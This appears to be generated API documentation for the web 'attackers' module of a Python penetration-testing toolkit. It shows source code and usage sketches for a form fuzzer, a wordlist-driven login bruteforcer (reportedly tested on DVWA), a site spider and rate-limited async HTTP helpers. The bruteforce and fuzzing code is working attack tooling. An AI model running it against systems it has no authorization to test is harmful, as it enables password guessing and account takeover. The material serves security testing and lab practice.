Name Type Description
str

returns html content of page after sending fuzzed form request

Source code in pyhtools\attackers\web\get_forms.py
def fuzz_forms(target_url:str):
    '''get forms from html page, send post request and return html response 

    Args: 
        target_url (str): webpage URL containing forms

    Returns: 
        str: returns html content of page after sending fuzzed form request
    '''
    page_content = get_page_content(target_url)

    # remove\r \t \n from the page content
    page_content = remove_escape_seq(page_content)

    page_html = BeautifulSoup(page_content,'html.parser')
    forms = page_html.find_all(name='form')
    for form in forms:
        action = form.get('action')
        post_url = urljoin(target_url, action)
        # print(post_url)

        # method = form.get('method')

        post_data_dict = {}
        inputs = form.find_all('input')
        for input in inputs:
            inp_name = input.get('name') 
            inp_type = input.get('type')
            inp_value = input.get('value')

            if inp_type == 'text':
                inp_value = 'pyhtools-form-test'

            elif inp_type == 'password':
                inp_value = 'pyhtools-P#$$Wd!!!'

            post_data_dict[inp_name]=inp_value

        post_response = requests.post(url=post_url, data=post_data_dict)
        post_response_content = remove_escape_seq(str(post_response.content))
        post_content = BeautifulSoup(post_response_content, 'html.parser')

        return str(post_content.prettify())
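
A minimal usage sketch (hypothetical page containing at least one form; fuzz_forms submits the first form it finds and returns the prettified response):

from pyhtools.attackers.web.get_forms import fuzz_forms

html = fuzz_forms('http://testphp.vulnweb.com/login.php')   # hypothetical target page
if html:
    print(html)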

get_page_content(url)

extracts html code of the webpage

Parameters:

Name Type Description Default
url str

webpage URL

required

Returns:

Name Type Description
str

HTML content of the webpage

Source code in pyhtools\attackers\web\get_forms.py
def get_page_content(url:str):
    '''extracts html code of the webpage 

    Args: 
        url (str): webpage URL

    Returns: 
        str: HTML content of the webpage
    '''
    response = requests.get(url)
    content = str(response.content)
    content = remove_escape_seq(content)
    return content

remove_escape_seq(content)

removes \r \t \n from the html parsed content if present.

Args: content (str): html content of webpage

Returns: str: returns escaped html code

Source code in pyhtools\attackers\web\get_forms.py
def remove_escape_seq(content:str)->str:
    r'''removes \r \t \n from the html parsed content if present.

    Args: 
        content (str): html content of webpage

    Returns: 
        str: returns escaped html code
    '''
    return content.replace(r'\n','').replace(r'\t','').replace(r'\r','')

Login Guesser

bruteforce_login(target_url, wordlist_file, post_values)

Bruteforces login requests on a website

Parameters:

Name Type Description Default
target_url str

URL of login page

required
wordlist_file str

path of wordlist file

required
post_values dict

dict containing key value pairs of POST data

required

Returns:

Type Description

None

Source code in pyhtools\attackers\web\login_guesser.py
def bruteforce_login(target_url:str, wordlist_file:str, post_values:dict):
    '''Bruteforces login requests on a website

    Args:
        target_url (str): URL of login page
        wordlist_file (str): path of wordlist file
        post_values (dict): dict containing key value pairs of POST data

    Returns:
        None
    '''
    # tested on DVWA web app.
    # target_url = "http://10.0.2.30/dvwa/login.php"
    # wordlist_file = "full_path_to_wordlist"
    # post_values = {"username":"admin", "password":"", "Login":"submit"}

    if os.path.isfile(wordlist_file):
        print(BRIGHT_WHITE + '[*] Wordlist File Found! Starting Bruteforce Attack!!')
        with open(wordlist_file,'r') as wordlist:
            for word in wordlist:
                password = word.strip()
                post_values['password'] = password
                post_response = requests.post(target_url, data=post_values)
                content = str(post_response.content)
                if "Login failed" not in content:
                    print(BRIGHT_YELLOW + '[*] Password Found! : ' + password)
                    sys.exit()

        print(BRIGHT_RED + '[!] Password Not Found!')

    else:
        print(BRIGHT_RED + '[-] Wordlist Not Found.')
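
A usage sketch mirroring the DVWA example noted in the source comments (target URL, wordlist path and POST fields are placeholders for your own setup):

from pyhtools.attackers.web.login_guesser import bruteforce_login

bruteforce_login(
    target_url='http://10.0.2.30/dvwa/login.php',
    wordlist_file='/path/to/wordlist.txt',
    post_values={'username': 'admin', 'password': '', 'Login': 'submit'},
)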

Spider

Spider

Spider class used to extract links from a website's webpages

Source code in pyhtools\attackers\web\spider.py
class Spider:
    '''
    Spider class used to extract links from a website's webpages
    '''
    def __init__(self, rate_limit: int = 100, delay: float = 0.0001, headers: dict = None) -> None:
        '''
        Spider constructor

        Args:
            rate_limit (int): number of concurrent requests at the same time 
            delay (float): delay between consecutive requests 
            headers (dict): overrides default headers while sending HTTP requests 

        Returns:
            None
        '''
        # set to save visited links on the whole website
        # to avoid repetition
        self.target_links = set()
        self._client = AsyncRLRequests(rate_limit=rate_limit, delay=delay, headers=headers)

    async def get_links(self, url: str) -> set:
        '''extracts links from the whole webpage

        Args: 
            url (str): URL of the webpage

        Returns: 
            list: list of links present in the webpage
        '''
        response = await self._client.request(url=url)
        html = response.get('res_body')
        if html is None:
            return set()

        soup = BeautifulSoup(html, 'html.parser')

        href_links = set()
        for link in soup.find_all(href=True):
            href_link = link.get('href')
            if href_link:
                href_links.add(href_link)

        return href_links

    async def get_target_links(self, url: str, print_link: bool = True):
        '''extracts and prints useful links that are
        related only to the target webpage

        Args: 
            url (str): URL of the target webpage
            print_link (bool): if True prints links found on console

        Returns:
            list: returns useful links list related to target webpage
        '''
        # extract links from page
        links:set = await self.get_links(url)

        new_links = set()
        for link in links:
            link = urljoin(url, link)

            if '#' in link:
                link = link.split('#')[0]

            if link not in self.target_links and url in link:
                link = unescape(link)
                new_links.add(link)

                if print_link:
                    print(link)

        return new_links

    async def start(self, target_url:str, print_links: bool = True):
        '''starts spider

        Args:
            target_url (str): URL of the target website
            print_links (bool): if True prints links found on console

        Returns:
            list: list of links found by spider
        '''
        queue = [target_url]
        while queue:
            # extract a link from queue
            current_url = queue.pop(0)

            # continue if url is already visited
            if current_url in self.target_links:
                continue

            # add url to visited set
            self.target_links.add(current_url)

            # skip scraping static files since it'll slow down process
            if current_url.endswith(('.css', '.js','.jpeg', '.png','.svg')):
                continue

            # get links from the current url
            links = await self.get_target_links(current_url, print_link=print_links)

            # add new links to queue
            queue.extend(links - self.target_links)

        return self.target_links
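
A minimal usage sketch (hypothetical target; start returns the set of visited links):

import asyncio
from pyhtools.attackers.web.spider import Spider

async def main():
    spider = Spider(rate_limit=50, delay=0.01)
    links = await spider.start('http://testphp.vulnweb.com/', print_links=True)
    print(f'{len(links)} links found')

asyncio.run(main())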

__init__(rate_limit=100, delay=0.0001, headers=None)

Spider constructor

Parameters:

Name Type Description Default
rate_limit int

number of concurrent requests at the same time

100
delay float

delay between consecutive requests

0.0001
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\spider.py
def __init__(self, rate_limit: int = 100, delay: float = 0.0001, headers: dict = None) -> None:
    '''
    Spider constructor

    Args:
        rate_limit (int): number of concurrent requests at the same time 
        delay (float): delay between consecutive requests 
        headers (dict): overrides default headers while sending HTTP requests 

    Returns:
        None
    '''
    # set to save visited links on the whole website
    # to avoid repetition
    self.target_links = set()
    self._client = AsyncRLRequests(rate_limit=rate_limit, delay=delay, headers=headers)

get_links(url) async

extracts links from the whole webpage

Parameters:

Name Type Description Default
url str

URL of the webpage

required

Returns:

Name Type Description
list set

list of links present in the webpage

Source code in pyhtools\attackers\web\spider.py
async def get_links(self, url: str) -> set:
    '''extracts links from the whole webpage

    Args: 
        url (str): URL of the webpage

    Returns: 
        list: list of links present in the webpage
    '''
    response = await self._client.request(url=url)
    html = response.get('res_body')
    if html is None:
        return set()

    soup = BeautifulSoup(html, 'html.parser')

    href_links = set()
    for link in soup.find_all(href=True):
        href_link = link.get('href')
        if href_link:
            href_links.add(href_link)

    return href_links

get_target_links(url, print_link=True) async

extracts and prints useful links that are related only to the target webpage

Parameters:

Name Type Description Default
url str

URL of the target webpage

required
print_link bool

if True prints links found on console

True

Returns:

Name Type Description
list

returns useful links list related to target webpage

Source code in pyhtools\attackers\web\spider.py
async def get_target_links(self, url: str, print_link: bool = True):
    '''extracts and prints useful links that are
    related only to the target webpage

    Args: 
        url (str): URL of the target webpage
        print_link (bool): if True prints links found on console

    Returns:
        list: returns useful links list related to target webpage
    '''
    # extract links from page
    links:set = await self.get_links(url)

    new_links = set()
    for link in links:
        link = urljoin(url, link)

        if '#' in link:
            link = link.split('#')[0]

        if link not in self.target_links and url in link:
            link = unescape(link)
            new_links.add(link)

            if print_link:
                print(link)

    return new_links

start(target_url, print_links=True) async

starts spider

Parameters:

Name Type Description Default
target_url str

URL of the target website

required
print_links bool

if True prints links found on console

True

Returns:

Name Type Description
list

list of links found by spider

Source code in pyhtools\attackers\web\spider.py
async def start(self, target_url:str, print_links: bool = True):
    '''starts spider

    Args:
        target_url (str): URL of the target website
        print_links (bool): if True prints links found on console

    Returns:
        list: list of links found by spider
    '''
    queue = [target_url]
    while queue:
        # extract a link from queue
        current_url = queue.pop(0)

        # continue if url is already visited
        if current_url in self.target_links:
            continue

        # add url to visited set
        self.target_links.add(current_url)

        # skip scraping static files since it'll slow down process
        if current_url.endswith(('.css', '.js','.jpeg', '.png','.svg')):
            continue

        # get links from the current url
        links = await self.get_target_links(current_url, print_link=print_links)

        # add new links to queue
        queue.extend(links - self.target_links)

    return self.target_links

Utils

AsyncRLRequests

Bases: AsyncRequests

Sends asynchronous rate-limited HTTP requests.

Source code in pyhtools\attackers\web\utils.py
class AsyncRLRequests(AsyncRequests):
    '''
    Sends asynchronous rate-limited HTTP requests.
    '''

    def __init__(self, rate_limit: int = 20, delay: float = 0.05, headers: dict = None) -> None:
        '''AsyncRLRequests constructor

        Args:
            rate_limit (int): number of concurrent requests at the same time
            delay (float): delay between consecutive requests
            headers (dict): overrides default headers while sending HTTP requests

        Returns:
            None
        '''
        assert isinstance(delay, float) or isinstance(delay, int)
        assert isinstance(rate_limit, float) or isinstance(rate_limit, int)

        self._delay = delay
        self._semaphore = asyncio.Semaphore(rate_limit)
        super().__init__(headers)

    async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
        '''Send HTTP requests asynchronously with rate limit and delay between the requests

        Args:
            url (str): URL of the webpage/endpoint
            method (str): HTTP methods (default: GET) supports GET, POST, 
            PUT, HEAD, OPTIONS, DELETE
            session (aiohttp.ClientSession): aiohttp Client Session for sending requests

        Returns:
            dict: returns request and response data as dict
        '''
        async with self._semaphore:
            response = await super().request(url, method, session, *args, **kwargs)
            await asyncio.sleep(self._delay)
            return response
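
A minimal usage sketch (hypothetical URL; the semaphore caps in-flight requests at rate_limit and each request is followed by the configured delay):

import asyncio
from pyhtools.attackers.web.utils import AsyncRLRequests

async def main():
    client = AsyncRLRequests(rate_limit=10, delay=0.1, headers={'User-Agent': 'pyhtools'})
    responses = await asyncio.gather(
        *[client.request(url='http://example.com/') for _ in range(25)]
    )
    print(responses[0]['status'], responses[0]['req_url'])

asyncio.run(main())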

__init__(rate_limit=20, delay=0.05, headers=None)

AsyncRLRequests constructor

Parameters:

Name Type Description Default
rate_limit int

number of concurrent requests at the same time

20
delay float

delay between consecutive requests

0.05
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\utils.py
def __init__(self, rate_limit: int = 20, delay: float = 0.05, headers: dict = None) -> None:
    '''AsyncRLRequests constructor

    Args:
        rate_limit (int): number of concurrent requests at the same time
        delay (float): delay between consecutive requests
        headers (dict): overrides default headers while sending HTTP requests

    Returns:
        None
    '''
    assert isinstance(delay, float) or isinstance(delay, int)
    assert isinstance(rate_limit, float) or isinstance(rate_limit, int)

    self._delay = delay
    self._semaphore = asyncio.Semaphore(rate_limit)
    super().__init__(headers)

request(url, method='GET', session=None, *args, **kwargs) async

Send HTTP requests asynchronously with rate limit and delay between the requests

Parameters:

Name Type Description Default
url str

URL of the webpage/endpoint

required
method str

HTTP methods (default: GET) supports GET, POST,

'GET'
session aiohttp.ClientSession

aiohttp Client Session for sending requests

None

Returns:

Name Type Description
dict ClientResponse

returns request and response data as dict

Source code in pyhtools\attackers\web\utils.py
async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
    '''Send HTTP requests asynchronously with rate limit and delay between the requests

    Args:
        url (str): URL of the webpage/endpoint
        method (str): HTTP methods (default: GET) supports GET, POST, 
        PUT, HEAD, OPTIONS, DELETE
        session (aiohttp.ClientSession): aiohttp Client Session for sending requests

    Returns:
        dict: returns request and response data as dict
    '''
    async with self._semaphore:
        response = await super().request(url, method, session, *args, **kwargs)
        await asyncio.sleep(self._delay)
        return response

AsyncRequests

AsyncRequests class helps to send HTTP requests.

Source code in pyhtools\attackers\web\utils.py
class AsyncRequests:
    '''
    AsyncRequests class helps to send HTTP requests.
    '''

    def __init__(self, headers: dict = None) -> None:
        '''AsyncRequests class constructor

        Args:
            headers (dict): overrides default headers while sending HTTP requests

        Returns:
            None
        '''
        self._headers = headers

    async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
        '''Send HTTP requests asynchronously

        Args:
            url (str): URL of the webpage/endpoint
            method (str): HTTP methods (default: GET) supports GET, POST, 
            PUT, HEAD, OPTIONS, DELETE
            session (aiohttp.ClientSession): aiohttp Client Session for sending requests

        Returns:
            dict: returns request and response data as dict
        '''
        is_new_session = False
        if not session:
            session = ClientSession(headers=self._headers)
            is_new_session = True

        method = str(method).upper()
        match method:
            case 'GET':
                sent_req = session.get(url, *args, **kwargs)
            case 'POST':
                sent_req = session.post(url, *args, **kwargs)
            case 'PUT':
                sent_req = session.put(url, *args, **kwargs)
            case 'PATCH':
                sent_req = session.patch(url, *args, **kwargs)
            case 'HEAD':
                sent_req = session.head(url, *args, **kwargs)
            case 'OPTIONS':
                sent_req = session.options(url, *args, **kwargs)
            case 'DELETE':
                sent_req = session.delete(url, *args, **kwargs)
            case _:
                # unsupported HTTP method: close any session we created and
                # fail early instead of hitting an unbound sent_req below
                if is_new_session:
                    await session.close()
                raise ValueError(f'Invalid HTTP method: {method}')


        resp_data = None
        async with sent_req as response:
            resp_data = {
                        "status": response.status,
                        "req_url": str(response.request_info.real_url),
                        "req_method": response.request_info.method,
                        "req_headers": dict(**response.request_info.headers),
                        "res_redirection": str(response.history),
                        "res_headers": dict(response.headers),
                        "res_body": await response.text(),
                    }
            if is_new_session:
                await session.close()

        return resp_data
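
A minimal usage sketch (hypothetical URL; when no session is passed, a ClientSession is created and closed internally):

import asyncio
from pyhtools.attackers.web.utils import AsyncRequests

async def main():
    client = AsyncRequests(headers={'User-Agent': 'pyhtools'})
    data = await client.request(url='http://example.com/', method='HEAD')
    print(data['status'], data['res_headers'].get('Server'))

asyncio.run(main())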

__init__(headers=None)

AsyncRequests class constructor

Parameters:

Name Type Description Default
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\utils.py
def __init__(self, headers: dict = None) -> None:
    '''AsyncRequests class constructor

    Args:
        headers (dict): overrides default headers while sending HTTP requests

    Returns:
        None
    '''
    self._headers = headers

request(url, method='GET', session=None, *args, **kwargs) async

Send HTTP requests asynchronously

Parameters:

Name Type Description Default
url str

URL of the webpage/endpoint

required
method str

HTTP methods (default: GET) supports GET, POST,

'GET'
session aiohttp.ClientSession

aiohttp Client Session for sending requests

None

Returns:

Name Type Description
dict ClientResponse

returns request and response data as dict

Source code in pyhtools\attackers\web\utils.py
async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
    '''Send HTTP requests asynchronously

    Args:
        url (str): URL of the webpage/endpoint
        method (str): HTTP methods (default: GET) supports GET, POST, 
        PUT, HEAD, OPTIONS, DELETE
        session (aiohttp.ClientSession): aiohttp Client Session for sending requests

    Returns:
        dict: returns request and response data as dict
    '''
    is_new_session = False
    if not session:
        session = ClientSession(headers=self._headers)
        is_new_session = True

    method = str(method).upper()
    match method:
        case 'GET':
            sent_req = session.get(url, *args, **kwargs)
        case 'POST':
            sent_req = session.post(url, *args, **kwargs)
        case 'PUT':
            sent_req = session.put(url, *args, **kwargs)
        case 'PATCH':
            sent_req = session.patch(url, *args, **kwargs)
        case 'HEAD':
            sent_req = session.head(url, *args, **kwargs)
        case 'OPTIONS':
            sent_req = session.options(url, *args, **kwargs)
        case 'DELETE':
            sent_req = session.delete(url, *args, **kwargs)
        case _:
            # unsupported HTTP method: close any session we created and
            # fail early instead of hitting an unbound sent_req below
            if is_new_session:
                await session.close()
            raise ValueError(f'Invalid HTTP method: {method}')


    resp_data = None
    async with sent_req as response:
        resp_data = {
                    "status": response.status,
                    "req_url": str(response.request_info.real_url),
                    "req_method": response.request_info.method,
                    "req_headers": dict(**response.request_info.headers),
                    "res_redirection": str(response.history),
                    "res_headers": dict(response.headers),
                    "res_body": await response.text(),
                }
        if is_new_session:
            await session.close()

    return resp_data